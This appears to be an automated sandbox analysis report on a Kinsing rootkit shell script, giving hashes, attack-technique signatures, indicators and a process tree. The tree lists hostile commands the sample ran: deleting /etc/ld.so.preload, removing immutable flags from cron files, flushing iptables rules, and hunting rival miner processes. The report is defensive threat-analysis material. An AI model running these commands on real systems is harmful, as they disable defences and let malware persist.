Analysis
-
max time kernel
89s -
max time network
102s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
24/02/2025, 03:47
Static task
static1
Behavioral task
behavioral1
Sample
e1ecb846011ce98ad8e3efe2aa9d511e1c08787f15810abd456792ed9e98818f.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
e1ecb846011ce98ad8e3efe2aa9d511e1c08787f15810abd456792ed9e98818f.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
e1ecb846011ce98ad8e3efe2aa9d511e1c08787f15810abd456792ed9e98818f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
e1ecb846011ce98ad8e3efe2aa9d511e1c08787f15810abd456792ed9e98818f.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
e1ecb846011ce98ad8e3efe2aa9d511e1c08787f15810abd456792ed9e98818f.sh
-
Size
15KB
-
MD5
172b3e8c945c05db4df45b71ed6ede69
-
SHA1
ed2a979c028bda056a58667a37e5e818e96ed24c
-
SHA256
e1ecb846011ce98ad8e3efe2aa9d511e1c08787f15810abd456792ed9e98818f
-
SHA512
344d68ef85b005f9fc63f1fbb62bcd564705269c1c20fefc639565a5e52d3d09a0ed24595b4edce0a68bebe704f5a18f91090b9407b549c28e7d4c015028aa36
-
SSDEEP
384:r5JxgzLuqlH2wx2vUaQa5/eN86704s80ooJQYgykWT4yCtvUsDjdWOoJwZ:trgXux7YJDj8OoJwZ
Malware Config
Signatures
-
Kinsing Rootkit
Rootkit reuses the publicly available BEURK rootkit.
-
Kinsing Rootkit payload 1 IoCs
resource yara_rule behavioral3/files/fstream-17.dat family_elf_kinsing_rootkit -
Kinsing family
-
Kinsing payload 1 IoCs
resource yara_rule behavioral3/files/fstream-16.dat family_elf_kinsing_loader -
Kinsing_rootkit family
-
Modifies the dynamic linker configuration file 2 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
description ioc Process File opened for modification /etc/ld.so.preload e1ecb846011ce98ad8e3efe2aa9d511e1c08787f15810abd456792ed9e98818f.sh -
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1720 chmod 1721 chmod 1694 chmod 1696 chmod 1705 chmod 1707 chmod 1712 chmod 1714 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /etc/data/kinsing 1722 e1ecb846011ce98ad8e3efe2aa9d511e1c08787f15810abd456792ed9e98818f.sh -
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 733 iptables -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
pid Process 1442 sudo -
Attempts to change immutable files 50 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 1597 sed 1602 xargs 1627 sed 727 chattr 1451 uname 1490 xargs 1511 xargs 1606 sed 1611 xargs 1626 xargs 1629 xargs 719 chattr 1528 xargs 1558 xargs 1600 sed 1618 sed 1661 xargs 1683 xargs 1480 xargs 1501 xargs 1533 xargs 1552 xargs 1564 xargs 1612 sed 1614 xargs 1623 xargs 1475 xargs 1620 xargs 1632 xargs 1605 xargs 1516 xargs 729 chattr 1540 xargs 1546 xargs 1609 sed 1624 sed 1644 xargs 1485 xargs 1506 xargs 1603 sed 1608 xargs 1630 sed 1672 xargs 1688 xargs 1496 xargs 1596 xargs 1599 xargs 1621 sed 1649 xargs 1521 xargs -
Creates/modifies Cron job 1 TTPs 64 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.hUs3nI crontab File opened for modification /var/spool/cron/crontabs/tmp.M6wlpg crontab File opened for modification /var/spool/cron/crontabs/tmp.8s4M20 crontab File opened for modification /var/spool/cron/crontabs/tmp.GacDmV crontab File opened for modification /var/spool/cron/crontabs/tmp.pF9qpN crontab File opened for modification /var/spool/cron/crontabs/tmp.mMDNc4 crontab File opened for modification /var/spool/cron/crontabs/tmp.No9PV1 crontab File opened for modification /var/spool/cron/crontabs/tmp.Dze6TH crontab File opened for modification /var/spool/cron/crontabs/tmp.3j1Z8e crontab File opened for modification /var/spool/cron/crontabs/tmp.OyDJKZ crontab File opened for modification /var/spool/cron/crontabs/tmp.gYNcQh crontab File opened for modification /var/spool/cron/crontabs/tmp.ME98fw crontab File opened for modification /var/spool/cron/crontabs/tmp.n9mh0q crontab File opened for modification /var/spool/cron/crontabs/tmp.eM1hgi crontab File opened for modification /var/spool/cron/crontabs/tmp.YWf8vg crontab File opened for modification /var/spool/cron/crontabs/tmp.ZDp5F1 crontab File opened for modification /var/spool/cron/crontabs/tmp.p8uAxg crontab File opened for modification /var/spool/cron/crontabs/tmp.xz7SSJ crontab File opened for modification /var/spool/cron/crontabs/tmp.Feunqb crontab File opened for modification /var/spool/cron/crontabs/tmp.hRO2DG crontab File opened for modification /var/spool/cron/crontabs/tmp.F0JpSH crontab File opened for modification /var/spool/cron/crontabs/tmp.4ev8u0 crontab File opened for modification /var/spool/cron/crontabs/tmp.YyEXnk crontab File opened for modification /var/spool/cron/crontabs/tmp.BIoKtC crontab File opened for modification /var/spool/cron/crontabs/tmp.e3wlqa crontab File opened for modification /var/spool/cron/crontabs/tmp.Nqb2DX crontab File opened for modification /var/spool/cron/crontabs/tmp.05hrcv crontab File opened for modification /var/spool/cron/crontabs/tmp.IUV2rj crontab File opened for modification /var/spool/cron/crontabs/tmp.90RCMv crontab File opened for modification /var/spool/cron/crontabs/tmp.uHl2nj crontab File opened for modification /var/spool/cron/crontabs/tmp.XhbvGF crontab File opened for modification /var/spool/cron/crontabs/tmp.S4eaN3 crontab File opened for modification /var/spool/cron/crontabs/tmp.wHYuAZ crontab File opened for modification /var/spool/cron/crontabs/tmp.cNsVo3 crontab File opened for modification /var/spool/cron/crontabs/tmp.UE41nj crontab File opened for modification /var/spool/cron/crontabs/tmp.Qo7SCd crontab File opened for modification /var/spool/cron/crontabs/tmp.hkPkNk crontab File opened for modification /var/spool/cron/crontabs/tmp.rMeYqD crontab File opened for modification /var/spool/cron/crontabs/tmp.QPj2rm crontab File opened for modification /var/spool/cron/crontabs/tmp.6frL4N crontab File opened for modification /var/spool/cron/crontabs/tmp.IMU3Ic crontab File opened for modification /var/spool/cron/crontabs/tmp.Sd5vsj crontab File opened for modification /var/spool/cron/crontabs/tmp.kPGKs7 crontab File opened for modification /var/spool/cron/crontabs/tmp.oOnanM crontab File opened for modification /var/spool/cron/crontabs/tmp.iLWBP7 crontab File opened for modification /var/spool/cron/crontabs/tmp.aso6r1 crontab File opened for modification /var/spool/cron/crontabs/tmp.JPCGRv crontab File opened for modification /var/spool/cron/crontabs/tmp.ouDGtl crontab File opened for modification /var/spool/cron/crontabs/tmp.YXNM1g crontab File opened for modification /var/spool/cron/crontabs/tmp.N9Zbjz crontab File opened for modification /var/spool/cron/crontabs/tmp.xQ2E4g crontab File opened for modification /var/spool/cron/crontabs/tmp.1MuLtC crontab File opened for modification /var/spool/cron/crontabs/tmp.tO8BQF crontab File opened for modification /var/spool/cron/crontabs/tmp.jNHDGF crontab File opened for modification /var/spool/cron/crontabs/tmp.QZqtU2 crontab File opened for modification /var/spool/cron/crontabs/tmp.FDZO8d crontab File opened for modification /var/spool/cron/crontabs/tmp.MiPYVH crontab File opened for modification /var/spool/cron/crontabs/tmp.DZ2dcx crontab File opened for modification /var/spool/cron/crontabs/tmp.pG1f7y crontab File opened for modification /var/spool/cron/crontabs/tmp.QgUR50 crontab File opened for modification /var/spool/cron/crontabs/tmp.EpxSh2 crontab File opened for modification /var/spool/cron/crontabs/tmp.GkUEmS crontab File opened for modification /var/spool/cron/crontabs/tmp.t9o8Zl crontab File opened for modification /var/spool/cron/crontabs/tmp.FDnriG crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /lib/systemd/system/bot.service e1ecb846011ce98ad8e3efe2aa9d511e1c08787f15810abd456792ed9e98818f.sh -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
Process Discovery 1 TTPs 12 IoCs
Adversaries may try to discover information about running processes.
pid Process 1502 ps 1517 ps 1524 ps 1529 ps 1592 ps 1640 ps 1645 ps 1684 ps 1492 ps 1497 ps 1507 ps 1512 ps -
description ioc Process File opened for reading /proc/37/cmdline pkill File opened for reading /proc/81/cmdline pkill File opened for reading /proc/filesystems crontab File opened for reading /proc/76/cmdline ps File opened for reading /proc/77/cmdline pkill File opened for reading /proc/372/status pkill File opened for reading /proc/126/cmdline pkill File opened for reading /proc/668/status pkill File opened for reading /proc/82/cmdline pkill File opened for reading /proc/21/cmdline ps File opened for reading /proc/1594/stat ps File opened for reading /proc/2 ls File opened for reading /proc/filesystems ps File opened for reading /proc/77/cmdline pkill File opened for reading /proc/235/status pkill File opened for reading /proc/11/status pkill File opened for reading /proc/filesystems ps File opened for reading /proc/24/status pkill File opened for reading /proc/1662/status ps File opened for reading /proc/cmdline systemctl File opened for reading /proc/filesystems ls File opened for reading /proc/37/stat ps File opened for reading /proc/71/cmdline pkill File opened for reading /proc/20/status pkill File opened for reading /proc/710/cmdline pkill File opened for reading /proc/17/cmdline ps File opened for reading /proc/9/cmdline pkill File opened for reading /proc/74/stat ps File opened for reading /proc/487/stat ps File opened for reading /proc/filesystems pkill File opened for reading /proc/7/cmdline pkill File opened for reading /proc/14/cmdline ps File opened for reading /proc/126/status pkill File opened for reading /proc/21/status pkill File opened for reading /proc/10/cmdline ps File opened for reading /proc/8/cmdline pkill File opened for reading /proc/77/status ps File opened for reading /proc/235/cmdline pkill File opened for reading /proc/692/status pkill File opened for reading /proc/235/cmdline pkill File opened for reading /proc/19/status pkill File opened for reading /proc/20/cmdline pkill File opened for reading /proc/359/cmdline pkill File opened for reading /proc/2/stat ps File opened for reading /proc/15/cmdline ps File opened for reading /proc/81/stat ps File opened for reading /proc/710/stat ps File opened for reading /proc/24/status pkill File opened for reading /proc/111/cmdline ps File opened for reading /proc/332/status pkill File opened for reading /proc/74/stat ps File opened for reading /proc/19/cmdline pkill File opened for reading /proc/13/status pkill File opened for reading /proc/160/cmdline pkill File opened for reading /proc/328/cmdline pkill File opened for reading /proc/70/status ps File opened for reading /proc/715/status ps File opened for reading /proc/82/status pkill File opened for reading /proc/71/cmdline pkill File opened for reading /proc/1448/cmdline pkill File opened for reading /proc/111/status pkill File opened for reading /proc/78/stat ps File opened for reading /proc/8/cmdline ps File opened for reading /proc/125/stat ps -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1392 ls 1827 sed
Processes
-
/tmp/e1ecb846011ce98ad8e3efe2aa9d511e1c08787f15810abd456792ed9e98818f.sh/tmp/e1ecb846011ce98ad8e3efe2aa9d511e1c08787f15810abd456792ed9e98818f.sh1⤵
- Modifies the dynamic linker configuration file
- Executes dropped EXE
- Modifies systemd
PID:715 -
/usr/bin/chattrchattr -i /etc/ld.so.preload2⤵
- Attempts to change immutable files
PID:719
-
-
/bin/rmrm -f /etc/ld.so.preload2⤵PID:723
-
-
/usr/bin/chattrchattr -R -ia /var/spool/cron2⤵
- Attempts to change immutable files
PID:727
-
-
/usr/bin/chattrchattr -ia /etc/crontab2⤵
- Attempts to change immutable files
PID:729
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:733
-
-
/bin/grepgrep exe2⤵PID:742
-
-
/bin/lsls -latrh /proc/12⤵PID:741
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:745
-
-
/bin/grepgrep exe2⤵PID:749
-
-
/bin/lsls -latrh /proc/102⤵PID:748
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:752
-
-
/bin/grepgrep exe2⤵PID:755
-
-
/bin/lsls -latrh /proc/112⤵PID:754
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:758
-
-
/bin/grepgrep exe2⤵PID:763
-
-
/bin/lsls -latrh /proc/1112⤵PID:762
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:765
-
-
/bin/grepgrep exe2⤵PID:769
-
-
/bin/lsls -latrh /proc/122⤵PID:768
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:771
-
-
/bin/grepgrep exe2⤵PID:774
-
-
/bin/lsls -latrh /proc/1252⤵PID:773
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:776
-
-
/bin/grepgrep exe2⤵PID:780
-
-
/bin/lsls -latrh /proc/1262⤵PID:779
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:782
-
-
/bin/grepgrep exe2⤵PID:785
-
-
/bin/lsls -latrh /proc/132⤵PID:784
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:787
-
-
/bin/grepgrep exe2⤵PID:790
-
-
/bin/lsls -latrh /proc/142⤵PID:789
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:792
-
-
/bin/grepgrep exe2⤵PID:795
-
-
/bin/lsls -latrh /proc/152⤵PID:794
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:797
-
-
/bin/grepgrep exe2⤵PID:800
-
-
/bin/lsls -latrh /proc/1542⤵PID:799
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:802
-
-
/bin/grepgrep exe2⤵PID:805
-
-
/bin/lsls -latrh /proc/162⤵PID:804
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:807
-
-
/bin/lsls -latrh /proc/1602⤵PID:809
-
-
/bin/grepgrep exe2⤵PID:810
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:812
-
-
/bin/grepgrep exe2⤵PID:815
-
-
/bin/lsls -latrh /proc/172⤵PID:814
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:817
-
-
/bin/grepgrep exe2⤵PID:820
-
-
/bin/lsls -latrh /proc/1772⤵PID:819
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:822
-
-
/bin/grepgrep exe2⤵PID:825
-
-
/bin/lsls -latrh /proc/182⤵PID:824
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:827
-
-
/bin/grepgrep exe2⤵PID:830
-
-
/bin/lsls -latrh /proc/192⤵PID:829
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:832
-
-
/bin/grepgrep exe2⤵PID:835
-
-
/bin/lsls -latrh /proc/22⤵
- Reads runtime system information
PID:834
-
-
